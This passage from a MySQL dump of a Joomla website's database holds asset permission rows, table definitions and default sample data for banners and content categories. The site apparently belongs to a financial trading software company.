Page','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(225,8,253,284,2,'com_content.category.84','UAE','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(226,8,285,290,2,'com_content.category.85','Bootstrap','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(227,225,258,259,3,'com_content.article.111','DFM','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(230,1,450,451,1,'com_joomlaupdate','com_joomlaupdate','{\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.delete\":{\"6\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(231,1,452,453,1,'com_tags','com_tags','{}'),(232,1,454,455,1,'com_contenthistory','com_contenthistory','{}'),(233,1,456,457,1,'com_ajax','com_ajax','{}'),(234,1,458,459,1,'com_postinstall','com_postinstall','{}'),(235,18,311,312,2,'com_modules.module.275','Email Subscription Form','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(236,18,313,314,2,'com_modules.module.270','Hero Area','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(237,18,315,316,2,'com_modules.module.245','Quick Deatails','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(238,18,317,318,2,'com_modules.module.284','Sample Of Our Clients','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(239,18,319,320,2,'com_modules.module.271','Services','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(240,18,321,322,2,'com_modules.module.285','Meet The Team || Lorem Ipsum is simply dummy text of the printing and typesetting industry','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(241,18,323,324,2,'com_modules.module.280','Clean Admin Panel','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(242,18,325,326,2,'com_modules.module.281','Future of Electronic Trading','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(243,18,327,328,2,'com_modules.module.287','Easy Styling','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(244,18,329,330,2,'com_modules.module.52','Breadcrumbs','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(245,18,331,332,2,'com_modules.module.267','Useful Links','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(246,39,170,171,3,'com_content.article.112','Partners','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(247,18,333,334,2,'com_modules.module.288','our partner','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(248,18,335,336,2,'com_modules.module.289','partner','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(249,39,172,173,3,'com_content.article.113','part','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(250,39,174,175,3,'com_content.article.114','Client','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(251,39,176,177,3,'com_content.article.115','Services','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(252,18,337,338,2,'com_modules.module.229','Our Skills','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(253,18,339,340,2,'com_modules.module.225','What We Do','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(254,18,341,342,2,'com_modules.module.272','Stunning Website within Minitues || Design, Functionality and Communication','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(255,18,343,344,2,'com_modules.module.282','100% automation','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(256,18,345,346,2,'com_modules.module.286','NEWS & EVENTS','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(257,39,178,179,3,'com_content.article.116','Products : Investment Soltuions','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(258,39,180,181,3,'com_content.article.117','Why FIT?','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(259,39,182,183,3,'com_content.article.118','FIT Products Portfolio includes:','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(260,39,184,185,3,'com_content.article.119','Brokerage Management Solution (WASATA)','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(261,39,186,187,3,'com_content.article.120','On-Line Trading System (BORSAT)','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(262,39,188,189,3,'com_content.article.121','E-Trade – Web based solution','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(263,39,190,191,3,'com_content.article.122','Mobile/Tablet Trading & Information Dissemination','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(264,39,192,193,3,'com_content.article.123','Interfaces with:','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(265,39,194,195,3,'com_content.article.124','Portfolio Management Solutions','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(266,39,196,197,3,'com_content.article.125','FUND Management Solutions','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(267,39,198,199,3,'com_content.article.126','Initial Public Offering Solution (IPO Manager)','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(268,39,200,201,3,'com_content.article.127','Initial Public Offering Solution (IPO Manager) (2)','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(269,225,260,261,3,'com_content.article.128','sico','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(270,225,262,263,3,'com_content.article.129','khartoom','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(271,225,264,265,3,'com_content.article.130','daman','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(272,225,266,267,3,'com_content.article.131','bankdubi','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(273,225,268,269,3,'com_content.article.132','ADCB','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(274,225,270,271,3,'com_content.article.133','commercial','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(275,225,272,273,3,'com_content.article.134','QNB','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(276,225,274,275,3,'com_content.article.135','GBCM','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(277,225,276,277,3,'com_content.article.136','ALSHOROOQ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(278,225,278,279,3,'com_content.article.137','fsc','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(279,225,280,281,3,'com_content.article.138','DLALA','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(280,225,282,283,3,'com_content.article.139','ALRAMZ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'); /*!40000 ALTER TABLE `fit_assets` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_associations` -- DROP TABLE IF EXISTS `fit_associations`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_associations` ( `id` int(11) NOT NULL COMMENT 'A reference to the associated item.', `context` varchar(50) NOT NULL COMMENT 'The context of the associated item.', `key` char(32) NOT NULL COMMENT 'The key for the association computed from an md5 on associated ids.', PRIMARY KEY (`context`,`id`), KEY `idx_key` (`key`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_associations` -- LOCK TABLES `fit_associations` WRITE; /*!40000 ALTER TABLE `fit_associations` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_associations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_banner_clients` -- DROP TABLE IF EXISTS `fit_banner_clients`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_banner_clients` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', `contact` varchar(255) NOT NULL default '', `email` varchar(255) NOT NULL default '', `extrainfo` text NOT NULL, `state` tinyint(3) NOT NULL default '0', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `metakey` text NOT NULL, `own_prefix` tinyint(4) NOT NULL default '0', `metakey_prefix` varchar(255) NOT NULL default '', `purchase_type` tinyint(4) NOT NULL default '-1', `track_clicks` tinyint(4) NOT NULL default '-1', `track_impressions` tinyint(4) NOT NULL default '-1', PRIMARY KEY (`id`), KEY `idx_own_prefix` (`own_prefix`), KEY `idx_metakey_prefix` (`metakey_prefix`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_banner_clients` -- LOCK TABLES `fit_banner_clients` WRITE; /*!40000 ALTER TABLE `fit_banner_clients` DISABLE KEYS */; INSERT INTO `fit_banner_clients` VALUES (1,'Joomla!','Administrator','email@email.com','',1,0,'0000-00-00 00:00:00','',0,'',-1,-1,-1); /*!40000 ALTER TABLE `fit_banner_clients` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_banner_tracks` -- DROP TABLE IF EXISTS `fit_banner_tracks`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_banner_tracks` ( `track_date` datetime NOT NULL, `track_type` int(10) unsigned NOT NULL, `banner_id` int(10) unsigned NOT NULL, `count` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`track_date`,`track_type`,`banner_id`), KEY `idx_track_date` (`track_date`), KEY `idx_track_type` (`track_type`), KEY `idx_banner_id` (`banner_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_banner_tracks` -- LOCK TABLES `fit_banner_tracks` WRITE; /*!40000 ALTER TABLE `fit_banner_tracks` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_banner_tracks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_banners` -- DROP TABLE IF EXISTS `fit_banners`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_banners` ( `id` int(11) NOT NULL auto_increment, `cid` int(11) NOT NULL default '0', `type` int(11) NOT NULL default '0', `name` varchar(255) NOT NULL default '', `alias` varchar(255) character set utf8 collate utf8_bin NOT NULL default '', `imptotal` int(11) NOT NULL default '0', `impmade` int(11) NOT NULL default '0', `clicks` int(11) NOT NULL default '0', `clickurl` varchar(200) NOT NULL default '', `state` tinyint(3) NOT NULL default '0', `catid` int(10) unsigned NOT NULL default '0', `description` text NOT NULL, `custombannercode` varchar(2048) NOT NULL, `sticky` tinyint(1) unsigned NOT NULL default '0', `ordering` int(11) NOT NULL default '0', `metakey` text NOT NULL, `params` text NOT NULL, `own_prefix` tinyint(1) NOT NULL default '0', `metakey_prefix` varchar(255) NOT NULL default '', `purchase_type` tinyint(4) NOT NULL default '-1', `track_clicks` tinyint(4) NOT NULL default '-1', `track_impressions` tinyint(4) NOT NULL default '-1', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `reset` datetime NOT NULL default '0000-00-00 00:00:00', `created` datetime NOT NULL default '0000-00-00 00:00:00', `language` char(7) NOT NULL default '', `created_by` int(10) unsigned NOT NULL default '0', `created_by_alias` varchar(255) NOT NULL default '', `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL default '0', `version` int(10) unsigned NOT NULL default '1', PRIMARY KEY (`id`), KEY `idx_state` (`state`), KEY `idx_own_prefix` (`own_prefix`), KEY `idx_metakey_prefix` (`metakey_prefix`), KEY `idx_banner_catid` (`catid`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_banners` -- LOCK TABLES `fit_banners` WRITE; /*!40000 ALTER TABLE `fit_banners` DISABLE KEYS */; INSERT INTO `fit_banners` VALUES (2,1,0,'Shop 1','shop-1',0,16,0,'http://shop.joomla.org/amazoncom-bookstores.html',1,15,'Get books about Joomla! at the Joomla! book shop.','',0,1,'','{\"imageurl\":\"images\\/banners\\/shop-ad-books.jpg\",\"width\":\"\",\"height\":\"\",\"alt\":\"Joomla! Books\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','en-GB',0,'','0000-00-00 00:00:00',0,1),(3,1,0,'Shop 2','shop-2',0,22,0,'http://shop.joomla.org',1,15,'T Shirts, caps and more from the Joomla! Shop.','',0,2,'','{\"imageurl\":\"images\\/banners\\/shop-ad.jpg\",\"width\":\"\",\"height\":\"\",\"alt\":\"Joomla! Shop\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','en-GB',0,'','0000-00-00 00:00:00',0,1),(4,1,0,'Support Joomla!','support-joomla',0,19,0,'http://contribute.joomla.org',1,15,'Your contributions of time, talent and money make Joomla! possible.','',0,3,'','{\"imageurl\":\"images\\/banners\\/white.png\",\"width\":\"\",\"height\":\"\",\"alt\":\"\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','en-GB',0,'','0000-00-00 00:00:00',0,1); /*!40000 ALTER TABLE `fit_banners` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_categories` -- DROP TABLE IF EXISTS `fit_categories`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_categories` ( `id` int(11) NOT NULL auto_increment, `asset_id` int(10) unsigned NOT NULL default '0' COMMENT 'FK to the #__assets table.', `parent_id` int(10) unsigned NOT NULL default '0', `lft` int(11) NOT NULL default '0', `rgt` int(11) NOT NULL default '0', `level` int(10) unsigned NOT NULL default '0', `path` varchar(255) NOT NULL default '', `extension` varchar(50) NOT NULL default '', `title` varchar(255) NOT NULL, `alias` varchar(255) character set utf8 collate utf8_bin NOT NULL default '', `note` varchar(255) NOT NULL default '', `description` mediumtext, `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `access` int(10) unsigned default NULL, `params` text NOT NULL, `metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.', `metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.', `metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.', `created_user_id` int(10) unsigned NOT NULL default '0', `created_time` datetime NOT NULL default '0000-00-00 00:00:00', `modified_user_id` int(10) unsigned NOT NULL default '0', `modified_time` datetime NOT NULL default '0000-00-00 00:00:00', `hits` int(10) unsigned NOT NULL default '0', `language` char(7) NOT NULL, `version` int(10) unsigned NOT NULL default '1', PRIMARY KEY (`id`), KEY `cat_idx` (`extension`,`published`,`access`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_path` (`path`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=86 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_categories` -- LOCK TABLES `fit_categories` WRITE; /*!40000 ALTER TABLE `fit_categories` DISABLE KEYS */; INSERT INTO `fit_categories` VALUES (1,0,0,0,107,0,'','system','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(9,34,1,91,92,1,'uncategorised','com_content','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'*',1),(10,35,1,89,90,1,'uncategorised','com_banners','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(11,36,1,85,86,1,'uncategorised','com_contact','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(12,37,1,21,22,1,'uncategorised','com_newsfeeds','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(13,38,1,17,18,1,'uncategorised','com_weblinks','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(14,39,1,9,16,1,'sample-data-articles','com_content','Sample Data-Articles','sample-data-articles','','',1,736,'2015-03-12 11:51:56',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(15,40,1,87,88,1,'sample-data-banners','com_banners','Sample Data-Banners','sample-data-banners','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(16,41,1,23,84,1,'sample-data-contact','com_contact','Sample Data-Contact','sample-data-contact','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(17,42,1,19,20,1,'sample-data-newsfeeds','com_newsfeeds','Sample Data-Newsfeeds','sample-data-newsfeeds','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(18,43,1,1,8,1,'sample-data-weblinks','com_weblinks','Sample Data-Weblinks','sample-data-weblinks','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(19,44,14,10,11,2,'sample-data-articles/joomla','com_content','Joomla!','joomla','','',1,736,'2015-03-12 11:52:04',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'*',1),(31,56,18,2,3,2,'sample-data-weblinks/park-links','com_weblinks','Park Links','park-links','','<p>Here are links to some of my favorite parks.</p>\r\n<p><em>The weblinks component provides an easy way to make links to external sites that are consistently formatted and categorised. You can create weblinks from the front end of your site.</em></p>',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"images\\/sampledata\\/parks\\/banner_cradle.jpg\"}','','','{\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'en-GB',1),(32,57,18,4,7,2,'sample-data-weblinks/joomla-specific-links','com_weblinks','Joomla! Specific Links','joomla-specific-links','','<p><div style=\"font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 76%; background-color: #ffffff; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; line-height: 1.3em; color: #333333;\"><p>A selection of links that are all related to the Joomla! Project.</p></div></p>',1,736,'2015-03-12 11:53:38',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(33,58,32,5,6,3,'sample-data-weblinks/joomla-specific-links/other-resources','com_weblinks','Other Resources','other-resources','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(34,59,16,24,25,2,'sample-data-contact/park-site','com_contact','Park Site','park-site','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',42,'2011-01-01 00:00:01',0,'en-GB',1),(35,60,16,26,83,2,'sample-data-contact/shop-site','com_contact','Shop Site','shop-site','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(36,61,35,27,28,3,'sample-data-contact/shop-site/staff','com_contact','Staff','staff','','<p>Please feel free to contact our staff at any time should you need assistance.</p>',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(37,62,35,29,82,3,'sample-data-contact/shop-site/fruit-encyclopedia','com_contact','Fruit Encyclopedia','fruit-encyclopedia','','<p> </p><p>Our directory of information about different kinds of fruit.</p><p>We love fruit and want the world to know more about all of its many varieties.</p><p>Although it is small now, we work on it whenever we have a chance.</p><p>All of the images can be found in <a href=\"http://commons.wikimedia.org/wiki/Main_Page\">Wikimedia Commons</a>.</p><p><img src=\"images/sampledata/fruitshop/apple.jpg\" border=\"0\" alt=\"Apples\" title=\"Apples\" /></p><p><em>This encyclopedia is implemented using the contact component, each fruit a separate contact and a category for each letter. A CSS style is used to create the horizontal layout of the alphabet headings. </em></p><p><em>If you wanted to, you could allow some users (such as your growers) to have access to just this category in the contact component and let them help you to create new content for the encyclopedia.</em></p><p> </p>',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(38,63,37,30,31,4,'sample-data-contact/shop-site/fruit-encyclopedia/a','com_contact','A','a','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(39,64,37,32,33,4,'sample-data-contact/shop-site/fruit-encyclopedia/b','com_contact','B','b','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(40,65,37,34,35,4,'sample-data-contact/shop-site/fruit-encyclopedia/c','com_contact','C','c','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(41,66,37,36,37,4,'sample-data-contact/shop-site/fruit-encyclopedia/d','com_contact','D','d','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(42,67,37,38,39,4,'sample-data-contact/shop-site/fruit-encyclopedia/e','com_contact','E','e','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(43,68,37,40,41,4,'sample-data-contact/shop-site/fruit-encyclopedia/f','com_contact','F','f','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(44,69,37,42,43,4,'sample-data-contact/shop-site/fruit-encyclopedia/g','com_contact','G','g','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(45,70,37,44,45,4,'sample-data-contact/shop-site/fruit-encyclopedia/h','com_contact','H','h','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(46,71,37,46,47,4,'sample-data-contact/shop-site/fruit-encyclopedia/i','com_contact','I','i','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 00:00:01',0,'*',1),(47,72,37,48,49,4,'sample-data-contact/shop-site/fruit-encyclopedia/j','com_contact','J','j','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',736,'2011-01-01 00:00:01',0,'2011-01-01 